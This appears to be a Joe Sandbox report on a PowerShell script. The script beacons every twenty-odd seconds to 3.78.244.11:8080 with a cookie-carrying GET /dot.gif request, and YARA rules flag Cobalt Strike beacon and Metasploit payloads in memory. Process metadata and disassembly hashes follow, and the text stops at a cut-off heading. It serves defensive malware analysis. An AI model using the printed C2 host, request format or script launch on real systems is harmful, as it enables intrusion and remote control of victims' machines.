Nov 25, 2024 19:59:33.097219944 CET | 49767 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:33.097309113 CET | 49767 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:33.199870110 CET | 49816 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:33.220618010 CET | 8080 | 49767 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:33.337953091 CET | 8080 | 49816 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:33.338037968 CET | 49816 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:33.338119030 CET | 49816 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:33.510299921 CET | 8080 | 49816 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:55.285233974 CET | 8080 | 49816 | 3.78.244.11 | 192.168.2.4
Nov 25, 2024 19:59:55.285300970 CET | 49816 | 8080 | 192.168.2.4 | 3.78.244.11
Nov 25, 2024 19:59:55.285366058 CET | 49816 | 8080 | 192.168.2.4 | 3.78.244.11
                                                  Nov 25, 2024 19:59:55.388755083 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.409780979 CET8080498163.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:55.508778095 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 19:59:55.508882046 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.509006023 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 19:59:55.629020929 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.416872025 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.416992903 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.483669043 CET498648080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.594501019 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.606303930 CET8080498643.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.716789007 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:17.716885090 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.716974974 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:17.837594986 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.635977030 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.636064053 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.636106014 CET499158080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.746836901 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.756062984 CET8080499153.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.878683090 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:00:39.878782034 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:39.878871918 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:00:40.005953074 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:01.824094057 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:01.824176073 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:01.824234009 CET499638080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:01.935704947 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:01.944303989 CET8080499633.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:02.055871010 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:02.056109905 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:02.056224108 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:02.178056955 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:23.980669022 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:23.980870008 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:23.981081009 CET500118080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.090967894 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.107604980 CET8080500113.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:24.216047049 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:24.216146946 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.216264963 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:24.336365938 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.137490034 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.137578964 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.137643099 CET500128080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.247189045 CET500138080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.257819891 CET8080500123.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.369203091 CET8080500133.78.244.11192.168.2.4
                                                  Nov 25, 2024 20:01:46.369317055 CET500138080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.369400978 CET500138080192.168.2.43.78.244.11
                                                  Nov 25, 2024 20:01:46.492402077 CET8080500133.78.244.11192.168.2.4
                                                  • 3.78.244.11:8080
All twelve HTTP sessions originate from PID 1900, C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (source IP 192.168.2.4, destination 3.78.244.11:8080), and each sends the same 382-byte outgoing request, shown once below; only the source port and the timestamp differ between sessions.

Session ID  Source Port  Timestamp                            Bytes transferred  Direction
0           49730        Nov 25, 2024 19:58:00.315752983 CET  382                OUT
1           49731        Nov 25, 2024 19:58:04.554482937 CET  382                OUT
2           49738        Nov 25, 2024 19:58:26.726310968 CET  382                OUT
3           49739        Nov 25, 2024 19:58:48.901523113 CET  382                OUT
4           49767        Nov 25, 2024 19:59:11.122419119 CET  382                OUT
5           49816        Nov 25, 2024 19:59:33.338119030 CET  382                OUT
6           49864        Nov 25, 2024 19:59:55.509006023 CET  382                OUT
7           49915        Nov 25, 2024 20:00:17.716974974 CET  382                OUT
8           49963        Nov 25, 2024 20:00:39.878871918 CET  382                OUT
9           50011        Nov 25, 2024 20:01:02.056224108 CET  382                OUT
10          50012        Nov 25, 2024 20:01:24.216264963 CET  382                OUT
11          50013        Nov 25, 2024 20:01:46.369400978 CET  382                OUT

Data (identical in every session):
GET /dot.gif HTTP/1.1
Accept: */*
Cookie: f757jzSoq0sKQ3fJ6KZmji18Q4ILsd26Gs7NrAj2OqsVVHu2Mmk+klzXHpGIocQZmk6FOZ8/+LaMILyJw2B3YcqbA13cv5YKyeS0Ax1UIPwuT3i/j9xdfYOMpIcp0FV6jdwC7/LKBDN2RLSKy+3jSaHwRduSBiQHuQTdwNqMpAw=
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Host: 3.78.244.11:8080
Connection: Keep-Alive
Cache-Control: no-cache


Target ID: 0
Start time: 13:57:56
Start date: 25/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\3.ps1"
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4122124036.0000022EF9EB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                  • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4114351286.0000022EF1952000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_MetasploitPayload_1, Description: Yara detected MetasploitPayload, Source: 00000000.00000002.4098790194.0000022EE28B3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                                  • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                                  • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000002.4114351286.0000022EF1AEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:1
                                                  Start time:13:57:56
                                                  Start date:25/11/2024
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:false


                                                    Execution Graph

                                                    Execution Coverage:0.5%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:3.6%
                                                    Total number of Nodes:166
                                                    Total number of Limit Nodes:4
                                                    [Execution graph data for the interactive graph viewer, not rendered in text: function nodes and edges in the 22ef9b28... and 22efa0b1.../22efa0c.../22efa0d... ranges, with Windows API call nodes including CryptAcquireContextA, CryptReleaseContext, GetSystemTimeAsFileTime, LoadLibraryA, GetCommandLineA, GetStartupInfoW, GetStdHandle, GetFileType, InitializeCriticalSectionAndSpinCount, Sleep, HeapAlloc, DecodePointer, TlsGetValue, TlsFree, GetLocalTime, GetCurrentProcess, VirtualFree, GetModuleHandleExW, GetProcAddress, ExitProcess and WSAIoctl.]

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Crypt$Context$Acquire$RandomRelease
                                                    • String ID: ($Microsoft Base Cryptographic Provider v1.0
                                                    • API String ID: 685801729-4046902070
                                                    • Opcode ID: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                    • Instruction ID: e0dce4cc2a14644e0b1c9e9311bb6bda24c502039a8ef50f9b64ed6995ef0360
                                                    • Opcode Fuzzy Hash: 0f7b575704e2efa4e71594adee21552c9336b074ba1ad3f512173577c0e57d68
                                                    • Instruction Fuzzy Hash: 87018E2130064192EB10CB95F98C359A7A1F7CCB84F458421C60887F75DF7CCA59E340

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Internet$Option$ConnectOpenRevertSelf
                                                    • String ID:
                                                    • API String ID: 1513466045-0
                                                    • Opcode ID: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                    • Instruction ID: bb1cd3debe3019e480fb20e441290b242909ee2c691dd24feec647ff74568fef
                                                    • Opcode Fuzzy Hash: a9b8b553a89bf16a576f3c9bc92d43a984d256c5d92c920833b48d6b9218c37a
                                                    • Instruction Fuzzy Hash: FF41DD36604741A2EF249B91F6A8BAA6351F79DB84F020015DA4A6FFBACF3CD405A740

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: IoctlSocketStartupclosesocket
                                                    • String ID:
                                                    • API String ID: 365704328-0
                                                    • Opcode ID: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                    • Instruction ID: 37be7bd6b35fde60571b749a9e6c42d2873fba7db6d50b62d02b5e69c14eb435
                                                    • Opcode Fuzzy Hash: 9f6035121241c12ff71e8e552415c275c25b201d0c9d2d3551ffb33b20d91594
                                                    • Instruction Fuzzy Hash: DE21D37261478092EB208F54F69475AB794F38C7E4F514625DE9947FA5CB3CC9059B00

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CleanupStartup
                                                    • String ID:
                                                    • API String ID: 915672949-0
                                                    • Opcode ID: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                    • Instruction ID: 743b429a6a01f2aa754972f08b7ca01f97f99139e6b4ea3ea24411af71b5055d
                                                    • Opcode Fuzzy Hash: d22241c7f1bd4084ee50ee5593018a46650914ab47a10bd4edb93220355cbedb
                                                    • Instruction Fuzzy Hash: 91111874601741A2FF28ABE0FB6C3952695E799340F43042A96150FFF7DE7D8948B710

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4120573142.0000022EF9B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EF9B10000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22ef9b10000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                    • Instruction ID: 64d935b796a8948b8af54684c1c5be4551e09c33a917b92f8fa5cf59113482da
                                                    • Opcode Fuzzy Hash: 74d038c8b1c51bf1d7765a817c366e135375bbd51fab872694d5e2c19deb3bea
                                                    • Instruction Fuzzy Hash: EC71B836219B8486CEA0CB4AE49435AB7A0F7C8B94F548125EFCE83B68DF3DD455CB04

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph data for the interactive graph viewer, not rendered in text: basic blocks and edges in the range 7ffd9b961711 to 7ffd9b961e86; the executed / not-executed colouring is not recoverable from the text.]
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4123671244.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b960000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e470f4a2a1087fd1e316c24ed9a0eb322546c85e9dc4b358ba5a119388b76d31
                                                    • Instruction ID: 016a1d9e89d3fc6bbbf3bbf5fe11c50e3c18476c5c778f07a4752db03dfaeed4
                                                    • Opcode Fuzzy Hash: e470f4a2a1087fd1e316c24ed9a0eb322546c85e9dc4b358ba5a119388b76d31
                                                    • Instruction Fuzzy Hash: 50421471B1EA8D9FEBA9EB68886457877E1EF55308B1900BED01DC71E3DE25AC42C341

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph data for the interactive graph viewer, not rendered in text: basic blocks and edges in the range 7ffd9b894045 to 7ffd9b8940aa; the executed / not-executed colouring is not recoverable from the text.]
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4123209199.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 766642d8149fbb2b3da10932499c4e1c0848f95b82c1e9c2643841360af33d23
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 1201A73020CB0C8FDB48EF0CE451AA5B7E0FB89320F10056DE58AC36A1D632E881CB41

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    [Control-flow graph data for the interactive graph viewer, not rendered in text: basic blocks and edges in the range 22efa0d6514 to 22efa0d6c4f, including calls to GetConsoleMode, GetConsoleCP, WideCharToMultiByte and GetLastError; the executed / not-executed colouring is not recoverable from the text.]
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                    • String ID: U
                                                    • API String ID: 3902385426-4171548499
                                                    • Opcode ID: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                    • Instruction ID: aabf93859eada7bb4af38d499ea594e99353ba957451c96b680afea2ccca6937
                                                    • Opcode Fuzzy Hash: a469b43449293490d86ed3caa32e41753b17625943497404ea198177ea08bf0b
                                                    • Instruction Fuzzy Hash: 1612E333624641A6EF208FA8F68835A77A1F78C754F520116EA894BFB5DF3DC485EB10
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.4122144871.0000022EFA0B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022EFA0B0000, based on PE: true
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0F8000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FB000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA0FE000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA101000.00000040.00001000.00020000.00000000.sdmp
                                                    • Associated: 00000000.00000002.4122144871.0000022EFA103000.00000040.00001000.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_22efa0b0000_powershell.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CreateCurrentFirstProcessProcess32SnapshotToolhelp32
                                                    • String ID: %s%d%d%s%s%d$%s%d%d$x64$x86
                                                    • API String ID: 718051232-1833344708
                                                    • Opcode ID: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                    • Instruction ID: 52f183691cf6e9bcb460890cda8940e7ae5c64d535038e925f8c3bd6c0759468
                                                    • Opcode Fuzzy Hash: 44ee8957408f2f3c2d0d1c1155748847862033341b6ca19cb8ca6a6e19bffbea
                                                    • Instruction Fuzzy Hash: 9582F411B04641B2FE68DBE6B76C7A912D0A78D780F964111DA0A8FFF6EE3CC546B704
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
